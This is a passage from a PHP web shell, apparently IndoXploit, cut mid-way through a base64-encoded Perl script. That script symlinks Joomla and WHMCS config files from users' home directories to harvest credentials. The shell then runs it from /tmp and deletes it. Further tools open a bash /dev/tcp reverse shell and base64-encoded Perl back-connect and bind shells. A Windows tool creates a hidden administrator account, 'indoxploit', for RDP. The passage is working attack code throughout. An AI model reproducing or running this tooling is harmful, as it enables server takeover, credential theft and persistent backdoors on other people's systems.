9uZmlndXJhdGlvbi5waHAnLCB0eXBlID0+ICdKb29tbGEnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL25ldy9jb25maWd1cmF0aW9uLnBocCcsIHR5cGUgPT4gJ0pvb21sYScgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvV0hNQ1Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC93aG1jczEvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9XaG1jcy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3dobWNzL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvd2htY3Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9XSE1DL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvV2htYy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3dobWMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9XSE0vc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9XaG0vc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC93aG0vc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9IT1NUL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvSG9zdC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2hvc3Qvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9TVVBQT1JURVMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9TdXBwb3J0ZXMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zdXBwb3J0ZXMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9kb21haW5zL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvZG9tYWluL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvSG9zdGluZy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0hPU1RJTkcvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9ob3N0aW5nL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ0FSVC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0NhcnQvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9jYXJ0L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvT1JERVIvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9PcmRlci9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL29yZGVyL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ0xJRU5UL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ2xpZW50L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvY2xpZW50L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ0xJRU5UQVJFQS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0NsaWVudGFyZWEvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9jbGllbnRhcmVhL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvU1VQUE9SVC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1N1cHBvcnQvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQklMTElORy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0JpbGxpbmcvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9iaWxsaW5nL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQlVZL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQnV5L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvYnV5L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvTUFOQUdFL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvTWFuYWdlL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvbWFuYWdlL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ0xJRU5UU1VQUE9SVC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0NsaWVudFN1cHBvcnQvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9DbGllbnRzdXBwb3J0L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvY2xpZW50c3VwcG9ydC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0NIRUNLT1VUL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQ2hlY2tvdXQvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9jaGVja291dC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0JJTExJTkdTL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQmlsbGluZ3Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9iaWxsaW5ncy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0JBU0tFVC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0Jhc2tldC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2Jhc2tldC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1NFQ1VSRS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1NlY3VyZS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3NlY3VyZS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1NBTEVTL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvU2FsZXMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zYWxlcy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0JJTEwvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9CaWxsL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvYmlsbC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1BVUkNIQVNFL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvUHVyY2hhc2Uvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9wdXJjaGFzZS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0FDQ09VTlQvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9BY2NvdW50L3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvYWNjb3VudC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL1VTRVIvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9Vc2VyL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvdXNlci9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0NMSUVOVFMvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9DbGllbnRzL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvY2xpZW50cy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL0JJTExJTkdTL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvQmlsbGluZ3Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9iaWxsaW5ncy9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL01ZL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvTXkvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9teS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3NlY3VyZS93aG0vc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htY3Mvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9LA0KCXtjb25maWdkaXIgPT4gJy9ob21lLycuJHVzZXJueWEuJy9wdWJsaWNfaHRtbC9wYW5lbC9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL2NsaWVudGVzL3N1Ym1pdHRpY2tldC5waHAnLCB0eXBlID0+ICdXSE1DUycgfSwNCgl7Y29uZmlnZGlyID0+ICcvaG9tZS8nLiR1c2VybnlhLicvcHVibGljX2h0bWwvY2xpZW50ZS9zdWJtaXR0aWNrZXQucGhwJywgdHlwZSA9PiAnV0hNQ1MnIH0sDQoJe2NvbmZpZ2RpciA9PiAnL2hvbWUvJy4kdXNlcm55YS4nL3B1YmxpY19odG1sL3N1cHBvcnQvb3JkZXIvc3VibWl0dGlja2V0LnBocCcsIHR5cGUgPT4gJ1dITUNTJyB9DQopOw0KZm9yZWFjaCAoQGFycmF5KXsNCglteSAkY29uZmlnbnlhID0gJF8tPntjb25maWdkaXJ9Ow0KCW15ICR0eXBlY29uZmlnID0gJF8tPnt0eXBlfTsNCglzeW1saW5rKCIkY29uZmlnbnlhIiwiaWR4X3N5bS8kdXNlcm55YS0kdHlwZWNvbmZpZy50eHQiKTsNCglta2RpciAiaWR4X3N5bS8kdXNlcm55YS0kdHlwZWNvbmZpZy50eHQiOw0KCXN5bWxpbmsoIiRjb25maWdueWEiLCJpZHhfc3ltLyR1c2VybnlhLSR0eXBlY29uZmlnLnR4dC8weDE5OTkudHh0Iik7DQoJY29weSgiaWR4X3N5bS9uZW11LnR4dCIsImlkeF9zeW0vJHVzZXJueWEtJHR5cGVjb25maWcudHh0Ly5odGFjY2VzcyIpIDsNCgl9DQp9DQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50ICI8aGVhZD48dGl0bGU+QnlwYXNzIDQwNCBCeSAweDE5OTk8L3RpdGxlPjwvaGVhZD4iOw0KcHJpbnQgJzxtZXRhIGh0dHAtZXF1aXY9InJlZnJlc2giIGNvbnRlbnQ9IjU7IHVybD1pZHhfc3ltIi8+JzsNCnByaW50ICc8Ym9keT48Y2VudGVyPjxoMT4weDE5OTkgTmV2ZXIgRGllPC9oMT4nOw0KcHJpbnQgJzxhIGhyZWY9ImlkeF9zeW0iPktsaWsgRGlzaW5pPC9hPic7DQp1bmxpbmsoJDApOw==";
  954. save("/tmp/symlink.pl", "w", base64_decode($sym['code']));
  955. exe("perl /tmp/symlink.pl");
  956. sleep(1);
  957. @unlink("/tmp/symlink.pl");
  958. @unlink("passwd.txt");
  959. @unlink("idx_sym/pas.txt");
  960. @unlink("idx_sym/nemu.txt");
  961. }
  962.  
  963. print "<div style='background: #ffffff; width: 100%; height: 100%'>";
  964. print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_sym/' frameborder='0' scrolling='yes'></iframe>";
  965. print "</div>";
  966. }
  967. elseif($toolsname === "network") {
  968. $args = explode(" ", $args);
  969.  
  970. if($args[0] === "bc") {
  971. if(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!"));
  972. if(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!"));
  973. if(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
  974.  
  975. if($args[3] === "bash") {
  976. exe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1");
  977. }
  978. elseif($args[3] === "perl") {
  979. $bc['code'] = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  980. save("/tmp/bc.pl", "w", base64_decode($bc['code']));
  981. $bc['exec'] = exe("perl /tmp/bc.pl ".$args[1]." ".$args[2]." 1>/dev/null 2>&1 &");
  982. sleep(1);
  983. print "<pre>".$bc['exec']."\n".exe("ps aux | grep bc.pl")."</pre>";
  984. @unlink("/tmp/bc.pl");
  985. }
  986. }
  987. elseif($args[0] === "bp") {
  988. if(empty($args[1])) die(color(1, 1, "Set Your PORT for Bind Port!"));
  989. if(empty($args[2])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
  990.  
  991. if($args[2] === "perl") {
  992. $bp['code'] = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  993. save("/tmp/bp.pl", "w", base64_decode($bp['code']));
  994. $bp['exec'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &");
  995. sleep(1);
  996. print "<pre>".$bp['exec']."\n".exe("ps aux | grep bp.pl")."</pre>";
  997. @unlink("/tmp/bp.pl");
  998. }
  999. }
  1000. else {
  1001. print color(1, 1, "Unknown '".$args[0]."'");
  1002. }
  1003. }
  1004. elseif($toolsname === "krdp") {
  1005. $args = explode(" ", $args);
  1006.  
  1007. if(OS() !== "Windows") die(color(1, 1, "Just For Windows Server"));
  1008. if(preg_match("/indoxploit/", exe("net user"))) die(color(1, 1, "[INFO] username 'indoxploit' already exists."));
  1009.  
  1010. $add_user = exe("net user indoxploit indoxploit /add");
  1011. $add_groups1 = exe("net localgroup Administrators indoxploit /add");
  1012. $add_groups2 = exe("net localgroup Administrator indoxploit /add");
  1013. $add_groups3 = exe("net localgroup Administrateur indoxploit /add");
  1014.  
  1015. print "[ RDP ACCOUNT INFO ]<br>
  1016. ------------------------------<br>
  1017. IP: ".color(1, 2, $GLOBALS['SERVERIP'])."<br>
  1018. Username: ".color(1, 2, "indoxploit")."<br>
  1019. Password: ".color(1, 2, "indoxploit")."<br>
  1020. ------------------------------<br><br>
  1021. [ STATUS ]<br>
  1022. ------------------------------<br>
  1023. ";
  1024.  
  1025. if($add_user) {
  1026. print "[add user] -> ".color(1, 2, "SUCCESS")."<br>";
  1027. }
  1028. else {
  1029. print "[add user] -> ".color(1, 1, "FAILED")."<br>";
  1030. }
  1031.  
  1032. if($add_groups1) {
  1033. print "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."<br>";
  1034. }
  1035. elseif($add_groups2) {
  1036. print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."<br>";
  1037. }
  1038. elseif($add_groups3) {
  1039. print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."<br>";
  1040. }
  1041. else {
  1042. print "[add localgroup] -> ".color(1, 1, "FAILED")."<br>";
  1043. }
  1044.  
  1045. print "------------------------------<br>";
  1046. }
  1047. }
